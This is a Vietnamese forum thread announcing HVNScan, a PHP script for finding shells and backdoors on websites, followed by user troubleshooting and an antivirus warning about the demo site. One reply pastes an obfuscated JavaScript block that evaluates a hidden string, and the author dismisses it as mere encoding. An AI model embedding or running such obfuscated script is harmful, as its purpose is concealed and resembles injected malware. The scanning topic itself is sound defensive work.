Chương trình quét mã độc website HVNScan

V

vanphu113

Khách VNXF
Trong lúc nằm viện thì tôi vô tình nghỉ ra là các bạn wapmaster luôn sợ website của mình đã bị chèn shell hay backdoor đại loại là sẽ bị ai đó hack..
Nhưng chưa biết cách bảo mật, bị hack rồi chỉ biết la lối chứ chẳn biết bảo mật lại hệ thống của mình.
vì vậy rảnh rổi ngồi code 1 file tool bằng php nhằm scan các mã độc trên website của các bạn. Chương trình này có thể 1 số người đã có thấy qua nhưng bản scan đấy không khả dụng bằng bản này, trên tool này tôi có các mẫu từ khóa về shell để các bạn có thể tìm ra nó dễ dàng không cần phải biết nhiều như mẩu đã share trên google.
1 hình ảnh làm demo:

7cpYZlN.png
Cách dùng rất đơn giản chỉ cần upload lên host,file code nhẹ chưa mã hóa an tâm và đảm bảo an toàn giải nén ra file hvnscan.php vào vào sẽ như trong ảnh trên.
Demo: http://freeweb5s.com/hvnscan.php

Bài viết này được phép chia sẻ vè dẫn link cho các diễn đàn wapmaster cùng sử dụng , chúc các bạn hành công./.
Nguồn: http://hvngroups.net/threads/chuong-trinh-quet-ma-dc-website-hvnscan-1833.hvn
 

pinro

Private
Tham gia
01/04/2016
Bài viết
33
Được Like
21
em up vo6 hosting roi ma kiem tra nó báo ko kiểm tra được file la sao ạ các bác xem giúp e ạ
untitled.png
 
V

vanphu113

Khách VNXF
em up vo6 hosting roi ma kiem tra nó báo ko kiểm tra được file la sao ạ các bác xem giúp e ạ
untitled.png
Bạn kiểm tra lại chmod trên hosting và có thể không thể dùng trên hosting free
 
  • Like
Reactions: THB

HadesQC

Private
Tham gia
05/03/2016
Bài viết
21
Được Like
17
cái này áp dụng cho mã nguồn khác dc ko admin
Bạn ơi cái này chỉ là 1 script check shell thôi,, hoạt động dc all source,, cái này để tìm kiếm thì vô cùng tiện lợi,, mình dùng php này để tìm kiếm qài
 
  • Like
Reactions: THB

nguyenbaodanh

Private
Tham gia
12/05/2016
Bài viết
33
Được Like
20
Mã:
<script type="text/javascript">
hackerpro536=~[];hackerpro536={___:++hackerpro536,$$$$:(![]+"")[hackerpro536],__$:++hackerpro536,$_$_:(![]+"")[hackerpro536],_$_:++hackerpro536,$_$$:({}+"")[hackerpro536],$$_$:(hackerpro536[hackerpro536]+"")[hackerpro536],_$$:++hackerpro536,$$$_:(!""+"")[hackerpro536],$__:++hackerpro536,$_$:++hackerpro536,$$__:({}+"")[hackerpro536],$$_:++hackerpro536,$$$:++hackerpro536,$___:++hackerpro536,$__$:++hackerpro536};hackerpro536.$_=(hackerpro536.$_=hackerpro536+"")[hackerpro536.$_$]+(hackerpro536._$=hackerpro536.$_[hackerpro536.__$])+(hackerpro536.$$=(hackerpro536.$+"")[hackerpro536.__$])+((!hackerpro536)+"")[hackerpro536._$$]+(hackerpro536.__=hackerpro536.$_[hackerpro536.$$_])+(hackerpro536.$=(!""+"")[hackerpro536.__$])+(hackerpro536._=(!""+"")[hackerpro536._$_])+hackerpro536.$_[hackerpro536.$_$]+hackerpro536.__+hackerpro536._$+hackerpro536.$;hackerpro536.$$=hackerpro536.$+(!""+"")[hackerpro536._$$]+hackerpro536.__+hackerpro536._+hackerpro536.$+hackerpro536.$$;hackerpro536.$=(hackerpro536.___)[hackerpro536.$_][hackerpro536.$_];hackerpro536.$(hackerpro536.$(hackerpro536.$$+"\""+"\\"+hackerpro536.__$+hackerpro536.$$_+hackerpro536.$$$+"\\"+hackerpro536.__$+hackerpro536.$$_+hackerpro536._$_+"\\"+hackerpro536.__$+hackerpro536.$_$+hackerpro536.__$+hackerpro536.__+hackerpro536.$$$_+"\\"+hackerpro536.__$+hackerpro536.__$+hackerpro536.___+"\\"+hackerpro536.__$+hackerpro536._$_+hackerpro536.$__+"\\"+hackerpro536.__$+hackerpro536.__$+hackerpro536.$_$+"\\"+hackerpro536.__$+hackerpro536.__$+hackerpro536.$__+hackerpro536.$_$_+"\\"+hackerpro536.__$+hackerpro536.$$_+hackerpro536._$$+"\\"+hackerpro536.__$+hackerpro536.__$+hackerpro536._$_+"\\"+hackerpro536.__$+hackerpro536._$_+hackerpro536._$$+"();"+"\"")())();
</script>

what the heo ?
 
V

vanphu113

Khách VNXF
Mã:
<script type="text/javascript">
hackerpro536=~[];hackerpro536={___:++hackerpro536,$$$$:(![]+"")[hackerpro536],__$:++hackerpro536,$_$_:(![]+"")[hackerpro536],_$_:++hackerpro536,$_$$:({}+"")[hackerpro536],$$_$:(hackerpro536[hackerpro536]+"")[hackerpro536],_$$:++hackerpro536,$$$_:(!""+"")[hackerpro536],$__:++hackerpro536,$_$:++hackerpro536,$$__:({}+"")[hackerpro536],$$_:++hackerpro536,$$$:++hackerpro536,$___:++hackerpro536,$__$:++hackerpro536};hackerpro536.$_=(hackerpro536.$_=hackerpro536+"")[hackerpro536.$_$]+(hackerpro536._$=hackerpro536.$_[hackerpro536.__$])+(hackerpro536.$$=(hackerpro536.$+"")[hackerpro536.__$])+((!hackerpro536)+"")[hackerpro536._$$]+(hackerpro536.__=hackerpro536.$_[hackerpro536.$$_])+(hackerpro536.$=(!""+"")[hackerpro536.__$])+(hackerpro536._=(!""+"")[hackerpro536._$_])+hackerpro536.$_[hackerpro536.$_$]+hackerpro536.__+hackerpro536._$+hackerpro536.$;hackerpro536.$$=hackerpro536.$+(!""+"")[hackerpro536._$$]+hackerpro536.__+hackerpro536._+hackerpro536.$+hackerpro536.$$;hackerpro536.$=(hackerpro536.___)[hackerpro536.$_][hackerpro536.$_];hackerpro536.$(hackerpro536.$(hackerpro536.$$+"\""+"\\"+hackerpro536.__$+hackerpro536.$$_+hackerpro536.$$$+"\\"+hackerpro536.__$+hackerpro536.$$_+hackerpro536._$_+"\\"+hackerpro536.__$+hackerpro536.$_$+hackerpro536.__$+hackerpro536.__+hackerpro536.$$$_+"\\"+hackerpro536.__$+hackerpro536.__$+hackerpro536.___+"\\"+hackerpro536.__$+hackerpro536._$_+hackerpro536.$__+"\\"+hackerpro536.__$+hackerpro536.__$+hackerpro536.$_$+"\\"+hackerpro536.__$+hackerpro536.__$+hackerpro536.$__+hackerpro536.$_$_+"\\"+hackerpro536.__$+hackerpro536.$$_+hackerpro536._$$+"\\"+hackerpro536.__$+hackerpro536.__$+hackerpro536._$_+"\\"+hackerpro536.__$+hackerpro536._$_+hackerpro536._$$+"();"+"\"")())();
</script>

what the heo ?
đây chỉ là 1 đoạn mã hóa js thôi bạn.
 

dakhucquan.net

MasterCorporal
Tham gia
27/06/2015
Bài viết
336
Được Like
151
có ai test chuẩn chưa cho e xin cái feedback đi ạ :))

thấy KIS nó báo ..tạch tạch tạch mấy phát liên tục đọc ko kịp, vậy ko biết do link site đó hay code có vấn đề các bác nhể?

NkYmy1z.png
 

phankt

Corporal
Tham gia
23/08/2016
Bài viết
116
Được Like
25
Bác chủ thớt cho hướng dẫn chi tiết chút đi ah..
E đang tập thành làm diễn đàn mà up lên check đỏ dực màn hình.. có tài liệu hướng dẫn tổng quan hay chi tiết về file này không bác ơi.
Lỗi
./library/Zend/...
./library/Minify
./install/language_en.php
./library/Zend/Validate/
./library/XenForo/Install/Model/
/install/templates


cách sửa như nào bác ơi
 
Sửa lần cuối:
V

vanphu113

Khách VNXF
có ai test chuẩn chưa cho e xin cái feedback đi ạ :))

thấy KIS nó báo ..tạch tạch tạch mấy phát liên tục đọc ko kịp, vậy ko biết do link site đó hay code có vấn đề các bác nhể?

NkYmy1z.png
Thông báo đó là do cái tên miền HVNTeam.net của tôi bị block thôi bạn. Không có vấn đề gì đâu. còn code thì các bạn có thể tự đọc được mà. có cái gì thì tôi share làm gì.
 

Hướng dẫn sử dụng

XenForo 1 XenForo 2
Translate by PVS

Dịch vụ XenForo của VNXF

Mr. Tuấn

Mobile/Zalo: 0988 488 096

Telegram: bluekpro

Email: [email protected]

Nhà Tài Trợ

Mút Xốp Không Gian
pallet Thịnh Phát
Top Bottom